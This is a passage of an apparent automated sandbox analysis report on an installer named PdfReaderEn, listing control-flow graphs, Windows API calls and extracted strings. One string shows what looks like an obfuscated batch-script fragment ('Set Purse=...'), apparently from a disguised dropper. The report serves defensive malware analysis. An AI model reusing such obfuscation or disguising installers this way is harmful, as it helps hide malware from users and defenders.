                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$Item$MessageSend$Show$CallbackDispatcherEnableMenuUser$DestroyEnabledLongSystemTextlstrlen
                                                                                                                                                                                          • String ID: @rD
                                                                                                                                                                                          • API String ID: 3906175533-3814967855
                                                                                                                                                                                          • Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                                                                                                                                                          • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                                                                                                                                                                          • Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                                                                                                                                                          • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 159 4015a0-4015f4 160 4030e3-4030ec 159->160 161 4015fa 159->161 185 4030ee-4030f2 160->185 163 401601-401611 call 4062a3 161->163 164 401742-40174f 161->164 165 401962-40197d call 40145c GetFullPathNameW 161->165 166 4019ca-4019e6 call 40145c SearchPathW 161->166 167 40176e-401794 call 40145c call 4062a3 SetFileAttributesW 161->167 168 401650-40166d call 40137e call 4062a3 call 40139d 161->168 169 4017b1-4017d8 call 40145c call 4062a3 call 405d59 161->169 170 401672-401686 call 40145c call 4062a3 161->170 171 401693-4016ac call 401446 call 4062a3 161->171 172 401715-401731 161->172 173 401616-40162d call 40145c call 4062a3 call 404f72 161->173 174 4016d6-4016db 161->174 175 401736-4030de 161->175 176 401897-4018a7 call 40145c call 4062d5 161->176 177 4018db-401910 call 40145c * 3 call 4062a3 MoveFileW 161->177 178 40163c-401645 161->178 179 4016bd-4016d1 call 4062a3 SetForegroundWindow 161->179 163->185 189 401751-401755 ShowWindow 164->189 190 401758-40175f 164->190 224 4019a3-4019a8 165->224 225 40197f-401984 165->225 166->160 217 4019ec-4019f8 166->217 167->160 242 40179a-4017a6 call 4062a3 167->242 168->185 264 401864-40186c 169->264 265 4017de-4017fc call 405d06 CreateDirectoryW 169->265 243 401689-40168e call 404f72 170->243 248 4016b1-4016b8 Sleep 171->248 249 4016ae-4016b0 171->249 172->185 186 401632-401637 173->186 183 401702-401710 174->183 184 4016dd-4016fd call 401446 174->184 175->160 219 4030de call 405f51 175->219 244 4018c2-4018d6 call 4062a3 176->244 245 4018a9-4018bd call 4062a3 176->245 272 401912-401919 177->272 273 40191e-401921 177->273 178->186 187 401647-40164e PostQuitMessage 178->187 179->160 183->160 184->160 186->185 187->186 189->190 190->160 208 401765-401769 ShowWindow 190->208 208->160 217->160 219->160 228 4019af-4019b2 224->228 225->228 235 401986-401989 225->235 228->160 238 4019b8-4019c5 GetShortPathNameW 228->238 235->228 246 40198b-401993 call 4062d5 235->246 238->160 259 4017ab-4017ac 242->259 243->160 244->185 245->185 246->224 269 401995-4019a1 call 406009 246->269 248->160 249->248 259->160 267 401890-401892 264->267 268 40186e-40188b call 404f72 call 406009 SetCurrentDirectoryW 264->268 277 401846-40184e call 4062a3 265->277 278 4017fe-401809 GetLastError 265->278 267->243 268->160 269->228 272->243 279 401923-40192b call 4062d5 273->279 280 40194a-401950 273->280 292 401853-401854 277->292 283 401827-401832 GetFileAttributesW 278->283 284 40180b-401825 GetLastError call 4062a3 278->284 279->280 298 40192d-401948 call 406c68 call 404f72 279->298 288 401957-40195d call 4062a3 280->288 290 401834-401844 call 4062a3 283->290 291 401855-40185e 283->291 284->291 288->259 290->292 291->264 291->265 292->291 298->288
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                                                                          • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                                                                          • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                                                                          • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                                                                          • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                                                                          • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                                                                          • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                                                                          • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                                                                          • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                                                                          • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                                                                          • Rename failed: %s, xrefs: 0040194B
                                                                                                                                                                                          • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                                                                          • Jump: %d, xrefs: 00401602
                                                                                                                                                                                          • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                                                                          • Aborting: "%s", xrefs: 0040161D
                                                                                                                                                                                          • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                                                                          • BringToFront, xrefs: 004016BD
                                                                                                                                                                                          • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                                                                          • Call: %d, xrefs: 0040165A
                                                                                                                                                                                          • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                                                                          • Rename: %s, xrefs: 004018F8
                                                                                                                                                                                          • Sleep(%d), xrefs: 0040169D
                                                                                                                                                                                          • detailprint: %s, xrefs: 00401679
                                                                                                                                                                                          • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                                                                          • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                                                                          • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                                                                          • API String ID: 2872004960-3619442763
                                                                                                                                                                                          • Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                                                                                                                                          • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                                                                                                                                                                          • Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 426 40592c-405944 call 4062fc 429 405946-405956 call 405f51 426->429 430 405958-405990 call 405ed3 426->430 438 4059b3-4059dc call 403e95 call 40677e 429->438 435 405992-4059a3 call 405ed3 430->435 436 4059a8-4059ae lstrcatW 430->436 435->436 436->438 444 405a70-405a78 call 40677e 438->444 445 4059e2-4059e7 438->445 451 405a86-405a8d 444->451 452 405a7a-405a81 call 406805 444->452 445->444 446 4059ed-405a15 call 405ed3 445->446 446->444 453 405a17-405a1b 446->453 455 405aa6-405acb LoadImageW 451->455 456 405a8f-405a95 451->456 452->451 460 405a1d-405a2c call 405d06 453->460 461 405a2f-405a3b lstrlenW 453->461 458 405ad1-405b13 RegisterClassW 455->458 459 405b66-405b6e call 40141d 455->459 456->455 457 405a97-405a9c call 403e74 456->457 457->455 465 405c35 458->465 466 405b19-405b61 SystemParametersInfoW CreateWindowExW 458->466 478 405b70-405b73 459->478 479 405b78-405b83 call 403e95 459->479 460->461 462 405a63-405a6b call 406722 call 406009 461->462 463 405a3d-405a4b lstrcmpiW 461->463 462->444 463->462 470 405a4d-405a57 GetFileAttributesW 463->470 469 405c37-405c3e 465->469 466->459 475 405a59-405a5b 470->475 476 405a5d-405a5e call 406751 470->476 475->462 475->476 476->462 478->469 484 405b89-405ba6 ShowWindow LoadLibraryW 479->484 485 405c0c-405c0d call 405047 479->485 487 405ba8-405bad LoadLibraryW 484->487 488 405baf-405bc1 GetClassInfoW 484->488 491 405c12-405c14 485->491 487->488 489 405bc3-405bd3 GetClassInfoW RegisterClassW 488->489 490 405bd9-405bfc DialogBoxParamW call 40141d 488->490 489->490 495 405c01-405c0a call 403c68 490->495 493 405c16-405c1c 491->493 494 405c2e-405c30 call 40141d 491->494 493->478 496 405c22-405c29 call 40141d 493->496 494->465 495->469 496->478
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                                                                                                            • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                                                                                                                            • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                                                                                                          • lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
                                                                                                                                                                                          • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                                                                                                                                                                          • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                                                                                                                                                                            • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                                                                                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                                                                                                                                                                          • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                                                                                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                                                                                                                                                                          • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                                                                                                                                                                            • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                                                                                                                                                                          • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                                                                                                                                                                          • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
                                                                                                                                                                                          • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                                                                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                                                                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                                                                                                                                                                          • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                                                                                                                                                                          • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                          • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                          • API String ID: 608394941-1650083594
                                                                                                                                                                                          • Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                                                                                                                                                          • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                          • lstrcatW.KERNEL32(00000000,00000000,open,004CB0B0,00000000,00000000), ref: 00401A76
                                                                                                                                                                                          • CompareFileTime.KERNEL32(-00000014,?,open,open,00000000,00000000,open,004CB0B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                                                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                                                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                                                          • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$open
                                                                                                                                                                                          • API String ID: 4286501637-2478300759
                                                                                                                                                                                          • Opcode ID: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                                                                                                                                                                          • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                                                                                                                                                                          • Opcode Fuzzy Hash: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 587 403587-4035d5 GetTickCount GetModuleFileNameW call 405e50 590 4035e1-40360f call 406009 call 406751 call 406009 GetFileSize 587->590 591 4035d7-4035dc 587->591 599 403615 590->599 600 4036fc-40370a call 4032d2 590->600 592 4037b6-4037ba 591->592 602 40361a-403631 599->602 606 403710-403713 600->606 607 4037c5-4037ca 600->607 604 403633 602->604 605 403635-403637 call 403336 602->605 604->605 611 40363c-40363e 605->611 609 403715-40372d call 403368 call 403336 606->609 610 40373f-403769 GlobalAlloc call 403368 call 40337f 606->610 607->592 609->607 637 403733-403739 609->637 610->607 635 40376b-40377c 610->635 613 403644-40364b 611->613 614 4037bd-4037c4 call 4032d2 611->614 619 4036c7-4036cb 613->619 620 40364d-403661 call 405e0c 613->620 614->607 623 4036d5-4036db 619->623 624 4036cd-4036d4 call 4032d2 619->624 620->623 634 403663-40366a 620->634 631 4036ea-4036f4 623->631 632 4036dd-4036e7 call 407281 623->632 624->623 631->602 636 4036fa 631->636 632->631 634->623 640 40366c-403673 634->640 641 403784-403787 635->641 642 40377e 635->642 636->600 637->607 637->610 640->623 643 403675-40367c 640->643 644 40378a-403792 641->644 642->641 643->623 645 40367e-403685 643->645 644->644 646 403794-4037af SetFilePointer call 405e0c 644->646 645->623 647 403687-4036a7 645->647 650 4037b4 646->650 647->607 649 4036ad-4036b1 647->649 651 4036b3-4036b7 649->651 652 4036b9-4036c1 649->652 650->592 651->636 651->652 652->623 653 4036c3-4036c5 652->653 653->623
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00403598
                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                                                                                                                                                                            • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                                                                                                                            • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                                                                                                                                                                          • Inst, xrefs: 0040366C
                                                                                                                                                                                          • Error launching installer, xrefs: 004035D7
                                                                                                                                                                                          • soft, xrefs: 00403675
                                                                                                                                                                                          • Null, xrefs: 0040367E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                          • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                          • API String ID: 4283519449-527102705
                                                                                                                                                                                          • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                                                                                                                                          • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                                                                                                                                                                          • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 654 40337f-403396 655 403398 654->655 656 40339f-4033a7 654->656 655->656 657 4033a9 656->657 658 4033ae-4033b3 656->658 657->658 659 4033c3-4033d0 call 403336 658->659 660 4033b5-4033be call 403368 658->660 664 4033d2 659->664 665 4033da-4033e1 659->665 660->659 666 4033d4-4033d5 664->666 667 4033e7-403407 GetTickCount call 4072f2 665->667 668 403518-40351a 665->668 669 403539-40353d 666->669 680 403536 667->680 682 40340d-403415 667->682 670 40351c-40351f 668->670 671 40357f-403583 668->671 673 403521 670->673 674 403524-40352d call 403336 670->674 675 403540-403546 671->675 676 403585 671->676 673->674 674->664 689 403533 674->689 678 403548 675->678 679 40354b-403559 call 403336 675->679 676->680 678->679 679->664 691 40355f-403572 WriteFile 679->691 680->669 685 403417 682->685 686 40341a-403428 call 403336 682->686 685->686 686->664 692 40342a-403433 686->692 689->680 693 403511-403513 691->693 694 403574-403577 691->694 695 403439-403456 call 407312 692->695 693->666 694->693 696 403579-40357c 694->696 699 40350a-40350c 695->699 700 40345c-403473 GetTickCount 695->700 696->671 699->666 701 403475-40347d 700->701 702 4034be-4034c2 700->702 703 403485-4034b6 MulDiv wsprintfW call 404f72 701->703 704 40347f-403483 701->704 705 4034c4-4034c7 702->705 706 4034ff-403502 702->706 712 4034bb 703->712 704->702 704->703 709 4034e7-4034ed 705->709 710 4034c9-4034db WriteFile 705->710 706->682 707 403508 706->707 707->680 711 4034f3-4034f7 709->711 710->693 713 4034dd-4034e0 710->713 711->695 715 4034fd 711->715 712->702 713->693 714 4034e2-4034e5 713->714 714->711 715->680
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 004033E7
                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00403464
                                                                                                                                                                                          • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                                                                                                                                                                          • wsprintfW.USER32 ref: 004034A4
                                                                                                                                                                                          • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • ... %d%%, xrefs: 0040349E
                                                                                                                                                                                          • Set Purse=VZBzPost-Meaning-Pour-Tired-Unsubscribe-Promote-Participants-Composition-PUMl-Movement-Zip-PdTemperature-She-Michel-Product-Promoted-Tire-Grey-Constraints-Continuing-vnHonda-Prayers-qLdJPatents-Fuck-Report-Carbon-Spam-Gd-Mailing-WaDMultim, xrefs: 004033A9
                                                                                                                                                                                          • X1C, xrefs: 004033ED
                                                                                                                                                                                          • X1C, xrefs: 0040343C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
